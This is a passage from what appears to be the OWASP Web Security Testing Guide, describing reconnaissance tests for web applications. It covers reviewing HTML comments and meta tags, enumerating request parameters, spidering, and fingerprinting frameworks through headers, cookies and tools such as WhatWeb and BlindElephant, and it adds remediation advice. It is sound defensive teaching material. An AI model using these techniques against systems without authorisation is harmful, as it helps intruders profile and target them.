information about the application. Sometimes they forget about the comments and leave them behind in production. Testers should look for HTML comments which start with “<!--” and end with “-->”.</p><p>Black-Box Testing</p><p>Check HTML source code for comments containing sensitive information that can help the attacker gain more insight about the application. 
It might be SQL code, usernames and passwords, internal IP addresses, or debugging information.</p><p>...</p><p><div class="table2"></p><p><div class="col1">1</div><div class="col2">Mary</div></p><p><div class="col1">2</div><div class="col2">Peter</div></p><p><div class="col1">3</div><div class="col2">Joe</div></p><p><!-- Query: SELECT id, name FROM app.users WHERE active='1' --></p><p></div></p><p>...</p><p>The tester may even find something like this:</p><p><!-- Use the DB administrator password for testing: f@keP@a$$w0rD --></p><p>Check HTML version information for valid version numbers and Document Type Definition (DTD) URLs:</p><p><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"></p><p>strict.dtd – default strict DTD</p><p>loose.dtd – loose DTD</p><p>frameset.dtd – DTD for frameset documents</p><p>Some Meta tags do not provide active attack vectors but instead allow an attacker to profile an application:</p><p><META name="Author" content="Andrew Muller"></p><p>A common (but not WCAG compliant) Meta tag is the refresh:</p><p><META http-equiv="Refresh" content="15;URL=https://www.owasp.org/index.html"></p><p>A common use of Meta tags is to specify keywords that a search engine may use to improve the quality of search results:</p><p><META name="keywords" lang="en-us" content="OWASP, security, sunshine, lollipops"></p><p>Although most web servers manage search engine indexing via the robots.txt file, it can also be managed by Meta tags. The tag below will advise robots to not index and not follow links on the HTML page containing the tag:</p><p><META name="robots" content="none"></p><p>The Platform for Internet Content Selection (PICS) and Protocol for Web Description Resources (POWDER) provide infrastructure for associating metadata with Internet content.</p><p>Gray-Box Testing</p><p>Not applicable.</p><p>Tools</p><p>Wget</p><p>Browser “view source” 
function</p><p>Eyeballs</p><p>Curl</p><p>References</p><p>Whitepapers</p><p>HTML version 4.01</p><p>XHTML</p><p>HTML version 5</p><p>https://www.gnu.org/software/wget/wget.html</p><p>https://curl.haxx.se/</p><p>https://www.w3.org/TR/1999/REC-html401-19991224</p><p>https://www.w3.org/TR/2010/REC-xhtml-basic-20101123/</p><p>https://www.w3.org/TR/html5/</p><p>Identify Application Entry Points</p><p>ID</p><p>WSTG-INFO-06</p><p>Summary</p><p>Enumerating the application and its attack surface is a key precursor before any thorough testing can be undertaken, as it allows the tester to identify likely areas of weakness. This section aims to help identify and map out areas within the application that should be investigated once enumeration and mapping have been completed.</p><p>Test Objectives</p><p>Understand how requests are formed and typical responses from the application.</p><p>How to Test</p><p>Before any testing begins, the tester should always get a good understanding of the application and how the user and browser communicate with it. As the tester walks through the application, they should pay attention to all HTTP requests as well as every parameter and form field that is passed to the application. They should pay special attention to when GET requests are used and when POST requests are used to pass parameters to the application. In addition, they also need to pay attention to when other methods for RESTful services are used.</p><p>Note that in order to see the parameters sent in the body of requests such as a POST request, the tester may want to use a tool such as an intercepting proxy (see Tools). 
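Since request bodies originate in HTML forms, a quick way to enumerate the fields a page will submit is to parse its source. A minimal sketch using only the Python standard library:

```python
# Sketch: list every <input> field (and its type) found in an HTML page,
# which surfaces hidden fields that are not visible in the browser.
from html.parser import HTMLParser

class FormFieldExtractor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.fields = []  # (name, type) pairs for every <input> found

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            a = dict(attrs)
            self.fields.append((a.get("name"), a.get("type", "text")))

def extract_fields(html):
    p = FormFieldExtractor()
    p.feed(html)
    return p.fields

# Example:
# extract_fields('<form><input type="hidden" name="price" value="62.50"></form>')
# -> [('price', 'hidden')]
```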
Within the POST request, the tester should also make special note of any hidden form fields that are being passed to the application, as these usually contain sensitive information, such as state information, the quantity of items, or the price of items, that the developer never intended for anyone to see or change.</p><p>In the author’s experience, it has been very useful to use an intercepting proxy and a spreadsheet for this stage of the testing. The proxy will keep track of every request and response between the tester and the application as they walk through it. Additionally, 
The rest of this guide will identify how to test each of these areas of interest, but this section must be</p><p>undertaken before any of the actual testing can commence.</p><p>Below are some points of interests for all requests and responses. Within the requests section, focus on the GET and</p><p>POST methods, as these appear the majority of the requests. Note that other methods, such as PUT and DELETE, can</p><p>be used. Often, these more rare requests, if allowed, can expose vulnerabilities. There is a special section in this guide</p><p>dedicated for testing these HTTP methods.</p><p>Requests</p><p>Identify where GETs are used and where POSTs are used.</p><p>Identify all parameters used in a POST request (these are in the body of the request).</p><p>Web Security Testing Guide v4.1</p><p>67</p><p>Within the POST request, pay special attention to any hidden parameters. When a POST is sent all the form fields</p><p>(including hidden parameters) will be sent in the body of the HTTP message to the application. These typically</p><p>aren’t seen unless a proxy or view the HTML source code is used. In addition, the next page shown, its data, and</p><p>the level of access can all be different depending on the value of the hidden parameter(s).</p><p>Identify all parameters used in a GET request (i.e., URL), in particular the query string (usually after a ? mark).</p><p>Identify all the parameters of the query string. These usually are in a pair format, such as foo=bar . Also note that</p><p>many parameters can be in one query string such as separated by a & , \~ , : , or any other special character or</p><p>encoding.</p><p>A special note when it comes to identifying multiple parameters in one string or within a POST request is that some</p><p>or all of the parameters will be needed to execute the attacks. The tester needs to identify all of the parameters</p><p>(even if encoded or encrypted) and identify which ones are processed by the application. 
Later sections of the</p><p>guide will identify how to test these parameters. At this point, just make sure each one of them is identified.</p><p>Also pay attention to any additional or custom type headers not typically seen (such as debug=False).</p><p>Responses</p><p>Identify where new cookies are set (Set-Cookie header), modified, or added to.</p><p>Identify where there are any redirects (3xx HTTP status code), 400 status codes, in particular 403 Forbidden, and</p><p>500 internal server errors during normal responses (i.e., unmodified requests).</p><p>Also note where any interesting headers are used. For example, “Server: BIG-IP” indicates that the site is load</p><p>balanced. Thus, if a site is load balanced and one server is incorrectly configured, then the tester might have to</p><p>make multiple requests to access the vulnerable server, depending on the type of load balancing used.</p><p>Black-Box Testing</p><p>Testing for Application Entry Points</p><p>The following are two examples on how to check for application entry points.</p><p>EXAMPLE 1</p><p>This example shows a GET request that would purchase an item from an online shopping application.</p><p>GET /shoppingApp/buyme.asp?CUSTOMERID=100&ITEM=z101a&PRICE=62.50&IP=x.x.x.x HTTP/1.1</p><p>Host: x.x.x.x</p><p>Cookie: SESSIONID=Z29vZCBqb2IgcGFkYXdhIG15IHVzZXJuYW1lIGlzIGZvbyBhbmQgcGFzc3dvcmQgaXMgYmFy</p><p>Here the tester would note all the parameters of the request such as CUSTOMERID, ITEM, PRICE, IP, and the</p><p>Cookie (which could just be encoded parameters or used for session state).</p><p>EXAMPLE 2</p><p>This example shows a POST request that would log you into an application.</p><p>POST /KevinNotSoGoodApp/authenticate.asp?service=login HTTP/1.1</p><p>Host: x.x.x.x</p><p>Cookie: SESSIONID=dGhpcyBpcyBhIGJhZCBhcHAgdGhhdCBzZXRzIHByZWRpY3RhYmxlIGNvb2tpZXMgYW5kIG1pbmUgaXMgMT</p><p>IzNA==</p><p>CustomCookie=00my00trusted00ip00is00x.x.x.x00</p><p>user=admin&pass=pass123&debug=true&fromtrustIP=true</p><p>In 
this example, the tester would note all the parameters as before; however, the majority of the parameters are passed in the body of the request and not in the URL. Additionally, note that there is a custom HTTP header ( CustomCookie ) being used.</p><p>Gray-Box Testing</p><p>Testing for application entry points via a gray-box methodology would consist of everything already identified above, with one addition. In cases where there are external sources from which the application receives data and processes it (such as SNMP traps, syslog messages, SMTP, or SOAP messages from other servers), a meeting with the application developers could identify any functions that would accept or expect user input and how they are formatted. For example, the developer could help in understanding how to formulate a correct SOAP request that the application would accept and where the web service resides (if the web service or any other function hasn’t already been identified during the black-box testing).</p><p>OWASP Attack Surface Detector</p><p>The Attack Surface Detector (ASD) tool investigates the source code and uncovers the endpoints of a web application, the parameters these endpoints accept, and the data type of those parameters. This includes the unlinked endpoints a spider will not be able to find, or optional parameters totally unused in client-side code. It also has the capability to calculate the changes in attack surface between two versions of an application.</p><p>The Attack Surface Detector is available as a plugin to both ZAP and Burp Suite, and a Command Line Interface (CLI) tool is also available. The CLI tool exports the attack surface as JSON output, which can then be used by the ZAP and Burp Suite plugins. This is helpful for cases where the source code is not provided to the penetration tester directly. 
For example, the penetration tester can get the JSON output file from a customer who does not want to provide the source code itself.</p><p>How to Use</p><p>The CLI jar file is downloadable from https://github.com/secdec/attack-surface-detector-cli/releases.</p><p>You can run the following command for ASD to identify endpoints from the source code of the target web application.</p><p>java -jar attack-surface-detector-cli-1.3.5.jar <source-code-path> [flags]</p><p>Here is an example of running the command against OWASP RailsGoat.</p><p>$ java -jar attack-surface-detector-cli-1.3.5.jar railsgoat/</p><p>Beginning endpoint detection for '<...>/railsgoat' with 1 framework types</p><p>Using framework=RAILS</p><p>[0] GET: /login (0 variants): PARAMETERS={url=name=url, paramType=QUERY_STRING, dataType=STRING}; FILE=/app/controllers/sessions_controller.rb (lines '6'-'9')</p><p>[1] GET: /logout (0 variants): PARAMETERS={}; FILE=/app/controllers/sessions_controller.rb (lines '33'-'37')</p><p>[2] POST: /forgot_password (0 variants): PARAMETERS={email=name=email, paramType=QUERY_STRING, dataType=STRING}; FILE=/app/controllers/password_resets_controller.rb (lines '29'-'38')</p><p>[3] GET: /password_resets (0 variants): PARAMETERS={token=name=token, paramType=QUERY_STRING, dataType=STRING}; FILE=/app/controllers/password_resets_controller.rb (lines '19'-'27')</p><p>[4] POST: /password_resets (0 variants): PARAMETERS={password=name=password, paramType=QUERY_STRING, dataType=STRING, user=name=user, paramType=QUERY_STRING, dataType=STRING, confirm_password=name=confirm_password, paramType=QUERY_STRING, dataType=STRING}; FILE=/app/controllers/password_resets_controller.rb (lines '5'-'17')</p><p>[5] GET: /sessions/new (0 variants): PARAMETERS={url=name=url, paramType=QUERY_STRING, dataType=STRING}; FILE=/app/controllers/sessions_controller.rb (lines '6'-'9')</p><p>[6] POST: /sessions (0 variants): PARAMETERS={password=name=password, paramType=QUERY_STRING, dataType=STRING, user_id=name=user_id, paramType=SESSION, dataType=STRING, remember_me=name=remember_me, paramType=QUERY_STRING, dataType=STRING, url=name=url, paramType=QUERY_STRING, dataType=STRING, email=name=email, paramType=QUERY_STRING, dataType=STRING}; FILE=/app/controllers/sessions_controller.rb (lines '11'-'31')</p><p>[7] DELETE: /sessions/{id} (0 variants): PARAMETERS={}; FILE=/app/controllers/sessions_controller.rb (lines '33'-'37')</p><p>[8] GET: /users (0 variants): PARAMETERS={}; FILE=/app/controllers/api/v1/users_controller.rb (lines '9'-'11')</p><p>[9] GET: /users/{id} (0 variants): PARAMETERS={}; FILE=/app/controllers/api/v1/users_controller.rb (lines '13'-'15')</p><p>... snipped ...</p><p>[38] GET: /api/v1/mobile/{id} (0 variants): PARAMETERS={id=name=id, paramType=QUERY_STRING, dataType=STRING, class=name=class, paramType=QUERY_STRING, dataType=STRING}; FILE=/app/controllers/api/v1/mobile_controller.rb (lines '8'-'13')</p><p>[39] GET: / (0 variants): PARAMETERS={url=name=url, paramType=QUERY_STRING, dataType=STRING}; FILE=/app/controllers/sessions_controller.rb (lines '6'-'9')</p><p>Generated 40 distinct endpoints with 0 variants for a total of 40 endpoints</p><p>Successfully validated serialization for these endpoints</p><p>0 endpoints were missing code start line</p><p>0 endpoints were missing code end line</p><p>0 endpoints had the same code start and end line</p><p>Generated 36 distinct parameters</p><p>Generated 36 total parameters</p><p>- 36/36 have their data type</p><p>- 0/36 have a list of accepted values</p><p>- 36/36 have their parameter type</p><p>--- QUERY_STRING: 35</p><p>--- SESSION: 1</p><p>Finished endpoint detection for '<...>/railsgoat'</p><p>----------</p><p>-- DONE --</p><p>0 projects had duplicate endpoints</p><p>Generated 40 distinct endpoints</p><p>Generated 40 total endpoints</p><p>Generated 36 distinct parameters</p><p>Generated 36 total parameters</p><p>1/1 projects had endpoints generated</p><p>To enable logging include the -debug argument</p><p>You can also generate a JSON output file using the -json flag, which can be used by the plugins for both ZAP and Burp Suite. See the following links for more details.</p><p>Home of ASD Plugin for OWASP ZAP: https://github.com/secdec/attack-surface-detector-zap/wiki</p><p>Home of ASD Plugin for PortSwigger Burp: https://github.com/secdec/attack-surface-detector-burp/wiki</p><p>Tools</p><p>OWASP Zed Attack Proxy (ZAP): https://www.zaproxy.org/</p><p>Burp Suite: https://www.portswigger.net/burp/</p><p>Fiddler: https://www.telerik.com/fiddler</p><p>References</p><p>RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1: https://tools.ietf.org/html/rfc2616</p><p>OWASP Attack Surface Detector: https://owasp.org/www-project-attack-surface-detector/</p><p>Map Execution Paths Through Application</p><p>ID</p><p>WSTG-INFO-07</p><p>Summary</p><p>Before commencing security testing, understanding the structure of the application is paramount. Without a thorough understanding of the layout of the application, it is unlikely that it will be tested thoroughly.</p><p>Test Objectives</p><p>Map the target application and understand the principal workflows.</p><p>How to Test</p><p>In black-box testing it is extremely difficult to test the entire code base. This is not just because the tester has no view of the code paths through the application, but also because, even if they did, testing all code paths would be very time consuming.
One way to reconcile this is to document which code paths were discovered and tested.</p><p>There are several ways to approach the testing and measurement of code coverage:</p><p>Path - test each of the paths through an application, including combinatorial and boundary value analysis testing for each decision path. While this approach offers thoroughness, the number of testable paths grows exponentially with each decision branch.</p><p>Data Flow (or Taint Analysis) - tests the assignment of variables via external interaction (normally users). Focuses on mapping the flow, transformation and use of data throughout an application.</p><p>Race - tests multiple concurrent instances of the application manipulating the same data.</p><p>The trade-off as to which method is used, and to what degree each method is used, should be negotiated with the application owner. Simpler approaches could also be adopted, including asking the application owner which functions or code sections they are particularly concerned about and how those code segments can be reached.</p><p>Black-Box Testing</p><p>To demonstrate code coverage to the application owner, the tester can start with a spreadsheet and document all the links discovered by spidering the application (either manually or automatically). Then the tester can look more closely at decision points in the application and investigate how many significant code paths are discovered. These should then be documented in the spreadsheet with URLs, prose and screenshot descriptions of the paths discovered.</p><p>Gray-Box or White-Box Testing</p><p>Ensuring sufficient code coverage for the application owner is far easier with a gray-box or white-box approach to testing.
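</p><p>The spreadsheet-based documentation described above can also be produced programmatically and exported for the application owner. The sketch below is illustrative only; the column names and sample rows are assumptions, not part of the guide:</p><p>
```python
import csv
import io

# Record discovered code paths as CSV rows that can be opened in any
# spreadsheet tool. Column names are illustrative.
def paths_to_csv(paths):
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["URL", "Method", "Decision point", "Notes"])
    writer.writerows(paths)
    return buf.getvalue()

discovered = [
    ["/login", "POST", "auth success vs. failure", "two branches observed"],
    ["/search", "GET", "empty vs. non-empty query", ""],
]
print(paths_to_csv(discovered))
```
</p><p>Prose and screenshot descriptions of each path can then be referenced from the notes column.</p><p>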
Information solicited by and provided to the tester will ensure the minimum requirements for code coverage are met.</p><p>Example</p><p>Automatic Spidering</p><p>The automatic spider is a tool used to automatically discover new resources (URLs) on a particular website. It begins with a list of URLs to visit, called the seeds, which depends on how the spider is started. While there are many spidering tools, the following example uses the Zed Attack Proxy (ZAP): https://github.com/zaproxy/zaproxy</p><p>Figure 4.1.7-1: Zed Attack Proxy Screen</p><p>ZAP offers the following automatic spidering features, which can be selected based on the tester's needs:</p><p>Spider Site - The seed list contains all the existing URIs already found for the selected site.</p><p>Spider Subtree - The seed list contains all the existing URIs already found and present in the subtree of the selected node.</p><p>Spider URL - The seed list contains only the URI corresponding to the selected node (in the Site Tree).</p><p>Spider all in Scope - The seed list contains all the URIs the user has selected as being 'In Scope'.</p><p>Tools</p><p>Zed Attack Proxy (ZAP): https://github.com/zaproxy/zaproxy</p><p>List of spreadsheet software: https://en.wikipedia.org/wiki/List_of_spreadsheet_software</p><p>Diagramming software: https://en.wikipedia.org/wiki/List_of_concept-_and_mind-mapping_software</p><p>References</p><p>Whitepapers</p><p>Code Coverage: https://en.wikipedia.org/wiki/Code_coverage</p><p>Fingerprint Web Application Framework</p><p>ID</p><p>WSTG-INFO-08</p><p>Summary</p><p>Web framework[*] fingerprinting is an important subtask of the information gathering process.
Knowing the type of framework can automatically give a great advantage if that framework has already been tested by the penetration tester. It is not only the known vulnerabilities in unpatched versions, but also the specific misconfigurations and known file structures of each framework, that make the fingerprinting process so important.</p><p>Several different vendors and versions of web frameworks are widely used. Information about the framework in use significantly helps in the testing process, and can also help in changing the course of the test. Such information can be derived by careful analysis of certain common locations. Most web frameworks have several markers in those locations which help an attacker to spot them. This is basically what all automatic tools do: they look for a marker in a predefined location and then compare it to a database of known signatures. For better accuracy, several markers are usually used.</p><p>[*] Please note that this article makes no differentiation between Web Application Frameworks and Content Management Systems (CMS). This has been done to make it convenient to fingerprint both of them in one chapter. Furthermore, both categories are referenced as web frameworks.</p><p>Test Objectives</p><p>To identify the type of web framework in use, so as to have a better understanding of the security testing methodology.</p><p>How to Test</p><p>Black-Box Testing</p><p>The most common locations to look at in order to identify the current framework are:</p><p>HTTP headers</p><p>Cookies</p><p>HTML source code</p><p>Specific files and folders</p><p>File extensions</p><p>Error messages</p><p>HTTP Headers</p><p>The most basic form of identifying a web framework is to look at the X-Powered-By field in the HTTP response header. Many tools can be used to fingerprint a target.
The simplest is the netcat utility.</p><p>Consider the following HTTP request-response:</p><p>$ nc 127.0.0.1 80</p><p>HEAD / HTTP/1.0</p><p>HTTP/1.1 200 OK</p><p>Server: nginx/1.0.14</p><p>Date: Sat, 07 Sep 2013 08:19:15 GMT</p><p>Content-Type: text/html;charset=ISO-8859-1</p><p>Connection: close</p><p>Vary: Accept-Encoding</p><p>X-Powered-By: Mono</p><p>From the X-Powered-By field, we understand that the web application framework is likely to be Mono. However, although this approach is simple and quick, this methodology doesn't work in 100% of cases. It is possible to easily disable the X-Powered-By header with a proper configuration. There are also several techniques that allow a web site to obfuscate HTTP headers (see an example in the Remediation section).</p><p>So in the same example the tester could either miss the X-Powered-By header or obtain an answer like the following:</p><p>HTTP/1.1 200 OK</p><p>Server: nginx/1.0.14</p><p>Date: Sat, 07 Sep 2013 08:19:15 GMT</p><p>Content-Type: text/html;charset=ISO-8859-1</p><p>Connection: close</p><p>Vary: Accept-Encoding</p><p>X-Powered-By: Blood, sweat and tears</p><p>Sometimes there are more HTTP headers that point to a certain web framework. In the following example, from the information in the HTTP response, one can see that the X-Powered-By header contains the PHP version. However, the X-Generator header points out that the framework actually used is Swiftlet, which helps a penetration tester to expand their attack vectors.
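</p><p>Inspecting every response header at once is also easy to script. The sketch below parses a raw response and picks out identification-relevant headers; the header list is illustrative only, since in practice any header may leak information:</p><p>
```python
# Extract fingerprint-relevant headers from a raw HTTP response.
# The set of interesting header names below is an illustrative assumption.
INTERESTING = {"server", "x-powered-by", "x-generator", "x-aspnet-version"}

def fingerprint_headers(raw_response):
    headers = {}
    # Only look at the header section, in case a body is attached.
    head = raw_response.split("\r\n\r\n")[0]
    for line in head.splitlines()[1:]:      # skip the status line
        if ":" not in line:
            continue
        name, _, value = line.partition(":")
        if name.strip().lower() in INTERESTING:
            headers[name.strip()] = value.strip()
    return headers

sample = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/1.0.14\r\n"
    "Date: Sat, 07 Sep 2013 08:19:15 GMT\r\n"
    "Content-Type: text/html;charset=ISO-8859-1\r\n"
    "X-Powered-By: Mono\r\n"
)
print(fingerprint_headers(sample))
# {'Server': 'nginx/1.0.14', 'X-Powered-By': 'Mono'}
```
</p><p>A real scan would obtain the raw response over the network, for example with netcat as shown above.</p><p>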
When performing fingerprinting, always carefully inspect every HTTP header for such leaks.</p><p>HTTP/1.1 200 OK</p><p>Server: nginx/1.4.1</p><p>Date: Sat, 07 Sep 2013 09:22:52 GMT</p><p>Content-Type: text/html</p><p>Connection: keep-alive</p><p>Vary: Accept-Encoding</p><p>X-Powered-By: PHP/5.4.16-1~dotdeb.1</p><p>Expires: Thu, 19 Nov 1981 08:52:00 GMT</p><p>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0</p><p>Pragma: no-cache</p><p>X-Generator: Swiftlet</p><p>Cookies</p><p>Another similar, and somewhat more reliable, way to determine the current web framework is via framework-specific cookies.</p><p>Consider the following HTTP request:</p><p>Figure 4.1.8-1: Cakephp HTTP Request</p><p>The cookie CAKEPHP has automatically been set, which gives information about the framework being used. A list of common cookie names is presented in the Cookies section below. The limitations are the same - it is possible to change the name of the cookie. For example, for the CakePHP framework this could be done with the following configuration (excerpt from core.php):</p><p>/**</p><p>* The name of CakePHP's session cookie.</p><p>*</p><p>* Note the guidelines for Session names states: "The session name references</p><p>* the session id in cookies and URLs. It should contain only alphanumeric</p><p>* characters."</p><p>* @link http://php.net/session_name</p><p>*/</p><p>Configure::write('Session.cookie', 'CAKEPHP');</p><p>However, these changes are less likely to be made than changes to the X-Powered-By header, so this approach can be considered more reliable.</p><p>HTML Source Code</p><p>This technique is based on finding certain patterns in the HTML page source code. Often one can find a lot of information which helps a tester to recognize a specific web framework. Common markers include HTML comments that directly lead to framework disclosure.
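</p><p>Extracting all HTML comments from a page is a quick first pass for such markers. A minimal sketch, where the sample input reuses the ColdFusion marker listed later in this chapter:</p><p>
```python
import re

# Collect the contents of all HTML comments, which often disclose
# the framework directly.
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)

def html_comments(html):
    return [c.strip() for c in COMMENT_RE.findall(html)]

page = '<html><!-- START headerTags.cfm --><body></body></html>'
print(html_comments(page))
# ['START headerTags.cfm']
```
</p><p>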
More often, certain framework-specific paths can be found, e.g. links to framework-specific CSS or JS folders. Finally, specific script variables might also point to a certain framework.</p><p>From the screenshot below one can easily learn the framework used and its version by the mentioned markers. The comment, specific paths and script variables can all help an attacker to quickly determine an instance of the ZK framework.</p><p>Figure 4.1.8-2: ZK Framework Markers</p><p>More frequently such information is placed between the <head> and </head> tags, in <meta> tags, or at the end of the page. Nevertheless, it is recommended to check the whole document since it can be useful for other purposes such as inspection of other useful comments and hidden fields. Sometimes, web developers do not care much about hiding information about the framework used. It is still possible to stumble upon something like this at the bottom of the page:</p><p>Figure 4.1.8-3: Banshee Bottom Page</p><p>File Extensions</p><p>URLs may include file extensions.
The file extensions can also help to identify the web platform or technology.</p><p>For example, OWASP is using PHP: https://www.owasp.org/index.php?title=Fingerprint_Web_Application_Framework&action=edit&section=4</p><p>Here are some common web extensions and technologies:</p><p>php – PHP</p><p>aspx – Microsoft ASP.NET</p><p>jsp – Java Server Pages</p><p>Error Message</p><p>Common Frameworks</p><p>Cookies</p><p>Framework – Cookie name</p><p>Zope – zope3</p><p>CakePHP – cakephp</p><p>Kohana – kohanasession</p><p>Laravel – laravel_session</p><p>HTML Source Code</p><p>General Markers</p><p>%framework_name%</p><p>powered by</p><p>built upon</p><p>running</p><p>Specific Markers</p><p>Framework – Keyword</p><p>Adobe ColdFusion – <!-- START headerTags.cfm</p><p>Microsoft ASP.NET – __VIEWSTATE</p><p>ZK – <!-- ZK</p><p>Business Catalyst – <!-- BC_OBNW --></p><p>Indexhibit – ndxz-studio</p><p>Specific Files and Folders</p><p>Specific files and folders are different for each framework. It is recommended to install the corresponding framework during penetration tests in order to have a better understanding of what infrastructure is present and what files might be left on the server. However, several good file lists already exist; one good example is the FuzzDB wordlists of predictable files/folders.</p><p>Tools</p><p>A list of general and well-known tools is presented below. There are also a lot of other utilities, as well as framework-based fingerprinting tools.</p><p>WhatWeb</p><p>Website: https://www.morningstarsecurity.com/research/whatweb</p><p>Currently one of the best fingerprinting tools on the market. Included in a default Kali Linux build.
Language: Ruby</p><p>Matches for fingerprinting are made with:</p><p>Text strings (case sensitive)</p><p>Regular expressions</p><p>Google Hack Database queries (limited set of keywords)</p><p>MD5 hashes</p><p>URL recognition</p><p>HTML tag patterns</p><p>Custom Ruby code for passive and aggressive operations</p><p>Sample output is presented in the screenshot below:</p><p>https://github.com/fuzzdb-project/fuzzdb</p><p>https://www.kali.org/</p><p>Figure 4.1.8-4: Whatweb Output Sample</p><p>BlindElephant</p><p>Website: http://blindelephant.sourceforge.net/</p><p>This great tool works on the principle of static-file checksums to detect version differences, thus providing very high-quality fingerprinting. Language: Python</p><p>Sample output of a successful fingerprint:</p><p>pentester$ python BlindElephant.py http://my_target drupal</p><p>Loaded /Library/Python/2.7/site-packages/blindelephant/dbs/drupal.pkl with 145 versions, 478 differentiating paths, and 434 version groups.</p><p>Starting BlindElephant fingerprint for version of drupal at http://my_target</p><p>Hit http://my_target/CHANGELOG.txt</p><p>File produced no match. Error: Retrieved file doesn't match known fingerprint. 527b085a3717bd691d47713dff74acf4</p><p>Hit http://my_target/INSTALL.txt</p><p>File produced no match. Error: Retrieved file doesn't match known fingerprint. 14dfc133e4101be6f0ef5c64566da4a4</p><p>Hit http://my_target/misc/drupal.js</p><p>Possible versions based on result: 7.12, 7.13, 7.14</p><p>Hit http://my_target/MAINTAINERS.txt</p><p>File produced no match.
Error: Retrieved file doesn't match known fingerprint. 36b740941a19912f3fdbfcca7caa08ca</p><p>Hit http://my_target/themes/garland/style.css</p><p>Possible versions based on result: 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9, 7.10, 7.11, 7.12, 7.13, 7.14</p><p>...</p><p>Fingerprinting resulted in:</p><p>7.14</p><p>Best Guess: 7.14</p><p>Wappalyzer</p><p>Website: https://www.wappalyzer.com/</p><p>Wappalyzer is a browser extension for Firefox and Chrome. It works only on regular expression matching and doesn't need anything other than the page to be loaded in the browser. It works completely at the browser level and gives results in the form of icons. Although it sometimes has false positives, it is very handy for getting a notion of which technologies were used to construct a target website immediately after browsing a page.</p><p>Note that by default, Wappalyzer will send anonymised data about the technology running on visited websites back to the developers, which is then sold to third parties. Make sure you disable this data collection in the add-on options.</p><p>Sample output of the plug-in is presented in the screenshot below.</p><p>Figure 4.1.8-5: Wappalyzer Output for OWASP Website</p><p>References</p><p>Whitepapers</p><p>Saumil Shah: "An Introduction to HTTP fingerprinting": https://web.archive.org/web/20190526182734/https://net-square.com/httprint_paper.html</p><p>Anant Shrivastava: "Web Application Finger Printing": https://anantshri.info/articles/web_app_finger_printing.html</p><p>Remediation</p><p>The general advice is to use several of the tools described above and check logs to better understand what exactly helps an attacker to disclose the web framework. By performing multiple scans after changes have been made to hide framework tracks, it's possible to achieve a better level of security and to make sure that the framework cannot be detected by automatic scans.
Below are some specific recommendations by framework marker location, and some additional interesting approaches.</p><p>HTTP Headers</p><p>Check the configuration and disable or obfuscate all HTTP headers that disclose information about the technologies used. Here is an interesting article about HTTP header obfuscation using Netscaler.</p><p>Cookies</p><p>It is recommended to change cookie names by making changes in the corresponding configuration files.</p><p>HTML Source Code</p><p>Manually check the contents of the HTML code and remove everything that explicitly points to the framework.</p><p>General guidelines:</p><p>Make sure there are no visual markers disclosing the framework</p><p>Remove any unnecessary comments (copyrights, bug information, specific framework comments)</p><p>Remove META and generator tags</p><p>Use the company's own CSS or JS files and do not store them in framework-specific folders</p><p>Do not use default scripts on the page, or obfuscate them if they must be used.</p><p>Specific Files and Folders</p><p>General guidelines:</p><p>Remove any unnecessary or unused files on the server. This includes text files disclosing information about versions and installation.</p><p>Restrict access to other files in order to return a 404 response when they are accessed from outside. This can be done, for example, by modifying the .htaccess file and adding RewriteCond or RewriteRule directives there. An example of such a restriction for two common WordPress folders is presented below.</p><p>RewriteCond %{REQUEST_URI} /wp-login\.php$ [OR]</p><p>RewriteCond %{REQUEST_URI} /wp-admin/$</p><p>RewriteRule $ /http://your_website [R=404,L]</p><p>However, these are not the only ways to restrict access.
In order to automate this process, certain framework-specific plugins exist. One example for WordPress is StealthLogin: https://wordpress.org/plugins/stealth-login-page</p><p>Additional Approaches</p><p>General guidelines:</p><p>Checksum management - The purpose of this approach is to beat checksum-based scanners and not let them disclose files by their hashes. Generally, there are two approaches to checksum management:</p><p>Change the location where those files are placed (i.e. move them to another folder, or rename the existing folder)</p><p>Modify the contents - even a slight modification results in a completely different hash sum, so adding a single byte at the end of the file should not be a big problem.</p><p>Controlled chaos - A funny and effective method that involves adding bogus files and folders from other frameworks in order to fool scanners and confuse an attacker. But be careful not to overwrite existing files and folders, and not to break the current framework!</p><p>Fingerprint Web Application</p><p>ID</p><p>WSTG-INFO-09</p><p>Summary</p><p>There is nothing new under the sun, and nearly every web application that one may think of developing has already been developed. With the vast number of free and open source software projects that are actively developed and deployed around the world, it is very likely that an application security test will face a target site that is entirely or partly dependent on these well-known applications (e.g. WordPress, phpBB, MediaWiki, etc.). Knowing the web application components that are being tested significantly helps in the testing process and will also drastically reduce the effort required during the test.
These well-known web applications have known HTML headers, cookies, and directory structures that can be enumerated to identify the application.</p><p>Test Objectives</p><p>Identify the web application and version to determine known vulnerabilities and the appropriate exploits to use during testing.</p><p>How to Test</p><p>Cookies</p><p>A relatively reliable way to identify a web application is by its application-specific cookies.</p><p>Consider the following HTTP request:</p><p>GET / HTTP/1.1</p><p>User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0</p><p>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</p><p>Accept-Language: en-US,en;q=0.5</p><p>Cookie: wp-settings-time-1=1406093286; wp-settings-time-2=1405988284</p><p>DNT: 1</p><p>Connection: keep-alive</p><p>Host: blog.owasp.org</p><p>The cookie wp-settings-time-1 has automatically been set, which gives information about the application being used. A list of common cookie names is presented in the Common Application Identifiers section. However, it is possible to change the name of the cookie.</p><p>HTML Source Code</p><p>This technique is based on finding certain patterns in the HTML page source code. Often one can find a lot of information which helps a tester to recognize a specific web application. Common markers include HTML comments that directly lead to application disclosure. More often, certain application-specific paths can be found, e.g. links to application-specific CSS or JS folders. Finally, specific script variables might also point to a certain application.</p><p>From the meta tag below, one can easily learn the application used by a website and its version.
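</p><p>Checking for a generator meta tag can be automated with a simple pattern match. The sketch below is illustrative only; attribute order and quoting vary across applications, so real tooling uses more robust HTML parsing:</p><p>
```python
import re

# Pull the value out of a <meta name="generator"> tag.
# Simple pattern; assumes the name attribute comes before content.
GENERATOR_RE = re.compile(
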